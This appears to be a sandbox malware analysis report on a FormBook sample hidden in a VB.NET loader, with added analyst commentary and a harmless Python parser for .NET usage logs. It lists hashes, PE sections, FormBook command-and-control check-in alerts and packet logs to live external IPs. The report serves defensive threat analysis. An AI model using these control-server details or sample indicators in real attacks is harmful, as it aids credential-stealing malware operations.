                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
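
The UsageLogs file is written by the .NET runtime itself, not by the sample's own code: it records the assemblies the CLR bound for this process, which is why the report lists it as dropped while still rating it "very likely benign". For an analyst it is an execution artifact that names the managed dependencies of the payload. The following Python is an added example, not part of the Joe Sandbox report: a small parser for this record format, run over the complete records visible in the preview above (the CRLF terminators the preview renders as ".." are restored; the truncated System.Xml record is omitted). Treating the leading integer as a record-type tag, with 2 meaning an assembly and 3 an assembly that resolved to an NGen native image whose path follows, is my reading of the visible rows and not a documented format.

```python
import csv

# Constructed sample: the complete records visible in the report's file preview,
# with CRLF line terminators restored.
USAGE_LOG = (
    '1,"fusion","GAC",0\r\n'
    '1,"WinRT","NotApp",1\r\n'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\\System.ni.dll",0\r\n'
    '2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\r\n'
    '2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0\r\n'
    '2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\r\n'
    '3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\f1d8480152e0da9a60ad49c6d16a3b6d\\System.Core.ni.dll",0\r\n'
    '3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\8d67d92724ba494b6c7fd089d6f25b48\\System.Configuration.ni.dll",0\r\n'
)

# Assumption (my reading of the visible rows, not a documented format):
#   2 = assembly record without a native-image path
#   3 = assembly record whose third field is the NGen native image it resolved to
ASSEMBLY_TAGS = {2, 3}


def parse_display_name(display_name):
    """'Name, Version=..., Culture=..., PublicKeyToken=...' -> dict with lower-case keys."""
    parts = [p.strip() for p in display_name.split(",")]
    info = {"name": parts[0]}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        info[key.strip().lower()] = value.strip()
    return info


def parse_usage_log(text):
    """Return one dict per assembly record, in load order."""
    records = []
    # The display names contain commas, so let the csv module honour the quoting.
    for row in csv.reader(text.splitlines()):
        if not row or not row[0].isdigit():
            continue
        tag = int(row[0])
        if tag not in ASSEMBLY_TAGS:
            continue
        rec = parse_display_name(row[1])
        rec["tag"] = tag
        rec["native_image"] = row[2] if tag == 3 and len(row) > 3 else None
        records.append(rec)
    return records


def loaded_assemblies(text):
    """Assembly simple names, in the order the runtime bound them."""
    return [r["name"] for r in parse_usage_log(text)]


def native_images(text):
    """Map of assembly name -> NGen image path, for the records that carried one.
    These paths are worth keeping: they tie the log to files under NativeImages
    whose timestamps can anchor a timeline."""
    return {r["name"]: r["native_image"] for r in parse_usage_log(text) if r["native_image"]}


if __name__ == "__main__":
    for rec in parse_usage_log(USAGE_LOG):
        print(f'{rec["name"]:24} {rec["version"]:10} {rec["publickeytoken"]}  {rec["native_image"] or "-"}')
```

Reading the output as an analyst: Microsoft.VisualBasic is the VB.NET runtime library, so its presence says the loader was compiled from VB.NET, and System.Windows.Forms plus System.Drawing say it was built as a WinForms application, which agrees with the "windows gui" subsystem in the Static PE Info below. None of that is the injected FormBook payload; it describes the .NET wrapper around it.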

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.70861569543812
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:457b22da_by_Libranalysis.exe
                                                                        File size:973824
                                                                        MD5:457b22da77d4db093a31dd80a4b8963f
                                                                        SHA1:83dc32633108d309f6b6b50a42dc102e7375f54c
                                                                        SHA256:8dc4c1a88f19df4a3731991e632688147b6132bcb6cffa2dfbef8ee081c6ddae
                                                                        SHA512:988bc10454baea85766b9af43d51073a155b17c63525795b55984e362b81e2e11717b947ce11c05d010682f8b92f5c73cc3918401b23cbaa44bfe976dec6d45e
                                                                        SSDEEP:24576:0Fu7fEF8VAJUFZ+MEEcg1B3DBp3LQySL683Olkck:oKeco9gXdBs681c
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T..`..............P.............. ....... ....@.. .......................@............@................................

                                                                        File Icon

                                                                        Icon Hash:c4b2f0f0f0f0b2c4

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4f200a
                                                                        Entrypoint Section:
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0x609B8954 [Wed May 12 07:52:52 2021 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:v4.0.30319
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [004F2000h]
(the remaining 97 instructions of the preview all decode as "add byte ptr [eax], al", which is how zero padding disassembles)

This is the standard native stub of a managed executable: with the default 0x400000 image base for a 32-bit executable (the base itself is not shown in this excerpt), 0x004F2000 is RVA 0xf2000, which the Data Directories table below lists as the IAT, and the only import is mscoree.dll!_CorExeMain. No native code of interest runs before the CLR loads the assembly.

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb887c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc4000          0x2b910       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xf0000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xf2000          0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0xb8000          0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name       Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
U#j;F_`    0x2000           0xb5830       0xb5a00   False     1.00031723159    data       7.99977911602    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.text      0xb8000          0xbe88        0xc000    False     0.443664550781   data       5.98775061458    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc      0xc4000          0x2b910       0x2ba00   False     0.166323424069   data       4.59329432672    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc     0xf0000          0xc           0x200     False     0.044921875      data       0.0980041756627  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
(unnamed)  0xf2000          0x10          0x200     False     0.044921875      data       0.142635768149   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Two rows stand out. The first section carries a garbage name (U#j;F_`), is readable, writable and executable at once, is by far the largest at 0xb5a00 bytes, and has an entropy of 7.9998 bits per byte with a ZLIB complexity above 1.0 (compressed size relative to raw size, so the bytes do not compress at all): that is the profile of an encrypted or already-compressed embedded payload rather than of compiled code. The last section has no name at all, is only 0x10 bytes long, and is where the IAT (RVA 0xf2000 in the Data Directories table) lives. The .text entropy of 5.99 is in the normal range for compiled code, and .rsrc and .reloc look ordinary.

Resources

Name           RVA      Size     Type
RT_ICON        0xc42e0  0x2f94   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON        0xc7274  0x10828  dBase III DBT, version number 0, next free block index 40
RT_ICON        0xd7a9c  0x94a8   data
RT_ICON        0xe0f44  0x5488   data
RT_ICON        0xe63cc  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 57599, next used block 4278648832
RT_ICON        0xea5f4  0x25a8   dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
RT_ICON        0xecb9c  0x10a8   dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
RT_ICON        0xedc44  0x988    data
RT_ICON        0xee5cc  0x468    GLS_BINARY_LSB_FIRST
RT_GROUP_ICON  0xeea34  0x84     data
RT_GROUP_ICON  0xeeab8  0x14     data
RT_VERSION     0xeeacc  0x3dc    data
RT_MANIFEST    0xeeea8  0xa65    XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

(The Language and Country columns were empty for every entry and are omitted.) The Type column is a libmagic guess over the raw resource bytes. An RT_ICON resource holds either a PNG (the 256 x 256 entry) or a headerless DIB bitmap, and the dBase DBT and GLS_BINARY matches on the DIB entries are false positives of that heuristic, not embedded database files; nothing in this table points beyond an ordinary multi-size icon set, a version block and a manifest.

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2013
Assembly Version  3.0.0.0
InternalName      DynamicPartitionEnumeratorForIndexRangeAbstract.exe
FileVersion       3.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName       ServerManager_Core
ProductVersion    3.0.0.0
FileDescription   ServerManager_Core
OriginalFilename  DynamicPartitionEnumeratorForIndexRangeAbstract.exe

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP    Dest IP
05/12/21-12:25:36.062502  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49731        80         192.168.2.3  34.95.69.141
05/12/21-12:25:36.062502  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49731        80         192.168.2.3  34.95.69.141
05/12/21-12:25:36.062502  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49731        80         192.168.2.3  34.95.69.141
05/12/21-12:26:02.702057  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49740        80         192.168.2.3  156.252.96.189
05/12/21-12:26:02.702057  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49740        80         192.168.2.3  156.252.96.189
05/12/21-12:26:02.702057  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49740        80         192.168.2.3  156.252.96.189
05/12/21-12:26:30.319867  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49746        80         192.168.2.3  184.168.131.241
05/12/21-12:26:30.319867  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49746        80         192.168.2.3  184.168.131.241
05/12/21-12:26:30.319867  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49746        80         192.168.2.3  184.168.131.241

The same three Emerging Threats SIDs (2031412, 2031449, 2031453) fire together on each check-in GET. The sample opened nine port-80 connections to eight different servers during the run (see the TCP Packets list below); the check-in rules matched on three of them, and each alert timestamp coincides with the first outbound data segment of its connection (49731 at 12:25:36.062, 49740 at 12:26:02.702, 49746 at 12:26:30.319).

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP        Dest IP
May 12, 2021 12:25:24.196033955 CEST  49728        80         192.168.2.3      52.128.23.153
May 12, 2021 12:25:24.380028963 CEST  80           49728      52.128.23.153    192.168.2.3
May 12, 2021 12:25:24.380197048 CEST  49728        80         192.168.2.3      52.128.23.153
May 12, 2021 12:25:24.565099001 CEST  80           49728      52.128.23.153    192.168.2.3
May 12, 2021 12:25:24.565185070 CEST  49728        80         192.168.2.3      52.128.23.153
May 12, 2021 12:25:24.747908115 CEST  80           49728      52.128.23.153    192.168.2.3
May 12, 2021 12:25:24.747936010 CEST  80           49728      52.128.23.153    192.168.2.3
May 12, 2021 12:25:24.747955084 CEST  80           49728      52.128.23.153    192.168.2.3
May 12, 2021 12:25:24.747977018 CEST  80           49728      52.128.23.153    192.168.2.3
May 12, 2021 12:25:24.747996092 CEST  80           49728      52.128.23.153    192.168.2.3
May 12, 2021 12:25:24.748023033 CEST  80           49728      52.128.23.153    192.168.2.3
May 12, 2021 12:25:24.748044968 CEST  80           49728      52.128.23.153    192.168.2.3
May 12, 2021 12:25:24.748064041 CEST  80           49728      52.128.23.153    192.168.2.3
May 12, 2021 12:25:24.748070955 CEST  49728        80         192.168.2.3      52.128.23.153
May 12, 2021 12:25:24.748081923 CEST  80           49728      52.128.23.153    192.168.2.3
May 12, 2021 12:25:24.748102903 CEST  49728        80         192.168.2.3      52.128.23.153
May 12, 2021 12:25:24.748121023 CEST  49728        80         192.168.2.3      52.128.23.153
May 12, 2021 12:25:24.748218060 CEST  49728        80         192.168.2.3      52.128.23.153
May 12, 2021 12:25:30.060600996 CEST  49730        80         192.168.2.3      202.210.8.86
May 12, 2021 12:25:30.334333897 CEST  80           49730      202.210.8.86     192.168.2.3
May 12, 2021 12:25:30.334551096 CEST  49730        80         192.168.2.3      202.210.8.86
May 12, 2021 12:25:30.334672928 CEST  49730        80         192.168.2.3      202.210.8.86
May 12, 2021 12:25:30.608279943 CEST  80           49730      202.210.8.86     192.168.2.3
May 12, 2021 12:25:30.836106062 CEST  49730        80         192.168.2.3      202.210.8.86
May 12, 2021 12:25:31.151423931 CEST  80           49730      202.210.8.86     192.168.2.3
May 12, 2021 12:25:32.124258041 CEST  80           49730      202.210.8.86     192.168.2.3
May 12, 2021 12:25:32.124294996 CEST  80           49730      202.210.8.86     192.168.2.3
May 12, 2021 12:25:32.124427080 CEST  49730        80         192.168.2.3      202.210.8.86
May 12, 2021 12:25:32.126872063 CEST  49730        80         192.168.2.3      202.210.8.86
May 12, 2021 12:25:36.021060944 CEST  49731        80         192.168.2.3      34.95.69.141
May 12, 2021 12:25:36.062160015 CEST  80           49731      34.95.69.141     192.168.2.3
May 12, 2021 12:25:36.062482119 CEST  49731        80         192.168.2.3      34.95.69.141
May 12, 2021 12:25:36.062501907 CEST  49731        80         192.168.2.3      34.95.69.141
May 12, 2021 12:25:36.103591919 CEST  80           49731      34.95.69.141     192.168.2.3
May 12, 2021 12:25:36.103701115 CEST  80           49731      34.95.69.141     192.168.2.3
May 12, 2021 12:25:36.103723049 CEST  80           49731      34.95.69.141     192.168.2.3
May 12, 2021 12:25:36.103907108 CEST  49731        80         192.168.2.3      34.95.69.141
May 12, 2021 12:25:36.104039907 CEST  49731        80         192.168.2.3      34.95.69.141
May 12, 2021 12:25:36.144942999 CEST  80           49731      34.95.69.141     192.168.2.3
May 12, 2021 12:25:46.233526945 CEST  49738        80         192.168.2.3      81.169.145.162
May 12, 2021 12:25:46.276640892 CEST  80           49738      81.169.145.162   192.168.2.3
May 12, 2021 12:25:46.276766062 CEST  49738        80         192.168.2.3      81.169.145.162
May 12, 2021 12:25:46.276973963 CEST  49738        80         192.168.2.3      81.169.145.162
May 12, 2021 12:25:46.319863081 CEST  80           49738      81.169.145.162   192.168.2.3
May 12, 2021 12:25:46.322741985 CEST  80           49738      81.169.145.162   192.168.2.3
May 12, 2021 12:25:46.322768927 CEST  80           49738      81.169.145.162   192.168.2.3
May 12, 2021 12:25:46.322952032 CEST  49738        80         192.168.2.3      81.169.145.162
May 12, 2021 12:25:46.323085070 CEST  49738        80         192.168.2.3      81.169.145.162
May 12, 2021 12:25:46.366920948 CEST  80           49738      81.169.145.162   192.168.2.3
May 12, 2021 12:25:51.537710905 CEST  49739        80         192.168.2.3      192.232.222.43
May 12, 2021 12:25:51.724255085 CEST  80           49739      192.232.222.43   192.168.2.3
May 12, 2021 12:25:51.724494934 CEST  49739        80         192.168.2.3      192.232.222.43
May 12, 2021 12:25:51.724770069 CEST  49739        80         192.168.2.3      192.232.222.43
May 12, 2021 12:25:51.909885883 CEST  80           49739      192.232.222.43   192.168.2.3
May 12, 2021 12:25:52.212724924 CEST  49739        80         192.168.2.3      192.232.222.43
May 12, 2021 12:25:52.438540936 CEST  80           49739      192.232.222.43   192.168.2.3
May 12, 2021 12:25:53.418782949 CEST  80           49739      192.232.222.43   192.168.2.3
May 12, 2021 12:25:53.418852091 CEST  49739        80         192.168.2.3      192.232.222.43
May 12, 2021 12:25:53.419245958 CEST  80           49739      192.232.222.43   192.168.2.3
May 12, 2021 12:25:53.419298887 CEST  49739        80         192.168.2.3      192.232.222.43
May 12, 2021 12:26:02.400471926 CEST  49740        80         192.168.2.3      156.252.96.189
May 12, 2021 12:26:02.701750040 CEST  80           49740      156.252.96.189   192.168.2.3
May 12, 2021 12:26:02.701894045 CEST  49740        80         192.168.2.3      156.252.96.189
May 12, 2021 12:26:02.702056885 CEST  49740        80         192.168.2.3      156.252.96.189
May 12, 2021 12:26:03.004113913 CEST  80           49740      156.252.96.189   192.168.2.3
May 12, 2021 12:26:03.197813988 CEST  49740        80         192.168.2.3      156.252.96.189
May 12, 2021 12:26:03.283816099 CEST  80           49740      156.252.96.189   192.168.2.3
May 12, 2021 12:26:03.283859015 CEST  80           49740      156.252.96.189   192.168.2.3
May 12, 2021 12:26:03.284008026 CEST  49740        80         192.168.2.3      156.252.96.189
May 12, 2021 12:26:03.285224915 CEST  49740        80         192.168.2.3      156.252.96.189
May 12, 2021 12:26:03.500299931 CEST  80           49740      156.252.96.189   192.168.2.3
May 12, 2021 12:26:03.500483036 CEST  49740        80         192.168.2.3      156.252.96.189
May 12, 2021 12:26:08.280189037 CEST  49741        80         192.168.2.3      184.168.131.241
May 12, 2021 12:26:08.492702961 CEST  80           49741      184.168.131.241  192.168.2.3
May 12, 2021 12:26:08.492861986 CEST  49741        80         192.168.2.3      184.168.131.241
May 12, 2021 12:26:08.493067980 CEST  49741        80         192.168.2.3      184.168.131.241
May 12, 2021 12:26:08.696099997 CEST  80           49741      184.168.131.241  192.168.2.3
May 12, 2021 12:26:08.756416082 CEST  80           49741      184.168.131.241  192.168.2.3
May 12, 2021 12:26:08.756465912 CEST  80           49741      184.168.131.241  192.168.2.3
May 12, 2021 12:26:08.756701946 CEST  49741        80         192.168.2.3      184.168.131.241
May 12, 2021 12:26:08.756794930 CEST  49741        80         192.168.2.3      184.168.131.241
May 12, 2021 12:26:08.959125996 CEST  80           49741      184.168.131.241  192.168.2.3
May 12, 2021 12:26:13.933931112 CEST  49744        80         192.168.2.3      64.98.145.30
May 12, 2021 12:26:14.072640896 CEST  80           49744      64.98.145.30     192.168.2.3
May 12, 2021 12:26:14.072834015 CEST  49744        80         192.168.2.3      64.98.145.30
May 12, 2021 12:26:14.073214054 CEST  49744        80         192.168.2.3      64.98.145.30
May 12, 2021 12:26:14.211807966 CEST  80           49744      64.98.145.30     192.168.2.3
May 12, 2021 12:26:14.218874931 CEST  80           49744      64.98.145.30     192.168.2.3
May 12, 2021 12:26:14.218928099 CEST  80           49744      64.98.145.30     192.168.2.3
May 12, 2021 12:26:14.219176054 CEST  49744        80         192.168.2.3      64.98.145.30
May 12, 2021 12:26:14.219377995 CEST  49744        80         192.168.2.3      64.98.145.30
May 12, 2021 12:26:30.125844955 CEST  49746        80         192.168.2.3      184.168.131.241
May 12, 2021 12:26:30.319618940 CEST  80           49746      184.168.131.241  192.168.2.3
May 12, 2021 12:26:30.319713116 CEST  49746        80         192.168.2.3      184.168.131.241
May 12, 2021 12:26:30.319866896 CEST  49746        80         192.168.2.3      184.168.131.241
May 12, 2021 12:26:30.512630939 CEST  80           49746      184.168.131.241  192.168.2.3
May 12, 2021 12:26:30.541549921 CEST  80           49746      184.168.131.241  192.168.2.3
May 12, 2021 12:26:30.541579962 CEST  80           49746      184.168.131.241  192.168.2.3
May 12, 2021 12:26:30.541796923 CEST  49746        80         192.168.2.3      184.168.131.241
May 12, 2021 12:26:30.541826963 CEST  49746        80         192.168.2.3      184.168.131.241

                                                                        UDP Packets

                                                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                         May 12, 2021 12:24:11.490417957 CEST | 49199 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:11.539120913 CEST | 53 | 49199 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:12.578938007 CEST | 50620 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:12.631120920 CEST | 53 | 50620 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:14.035444975 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:14.084173918 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:15.181551933 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:15.231316090 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:15.543701887 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:15.605519056 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:15.981714010 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:16.033436060 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:17.336888075 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:17.385696888 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:18.181982040 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:18.230753899 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:19.137824059 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:19.189327002 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:20.389323950 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:20.438283920 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:21.650604963 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:21.702214956 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:22.792871952 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:22.842051983 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:24.150654078 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:24.202336073 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:24.988667965 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:25.037595987 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:26.231024981 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:26.281500101 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:27.036566973 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:27.085688114 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:30.414036036 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:30.462858915 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:31.331482887 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:31.382544994 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:32.426213026 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:32.475207090 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:24:44.212776899 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:24:44.275077105 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:25:01.522687912 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:25:01.571486950 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:25:04.099765062 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:25:04.171396017 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:25:24.027081966 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:25:24.189014912 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:25:27.239752054 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:25:27.298490047 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:25:29.761121035 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:25:30.059087992 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:25:35.858010054 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:25:36.019768000 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:25:40.691852093 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:25:40.749140978 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:25:43.211719990 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:25:43.281693935 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:25:46.166529894 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:25:46.232381105 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:25:51.342669964 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:25:51.535154104 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:25:57.237812042 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:25:57.300525904 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:26:02.336038113 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:26:02.398396015 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:26:08.219162941 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:26:08.278670073 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:26:11.962909937 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:26:12.037271976 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
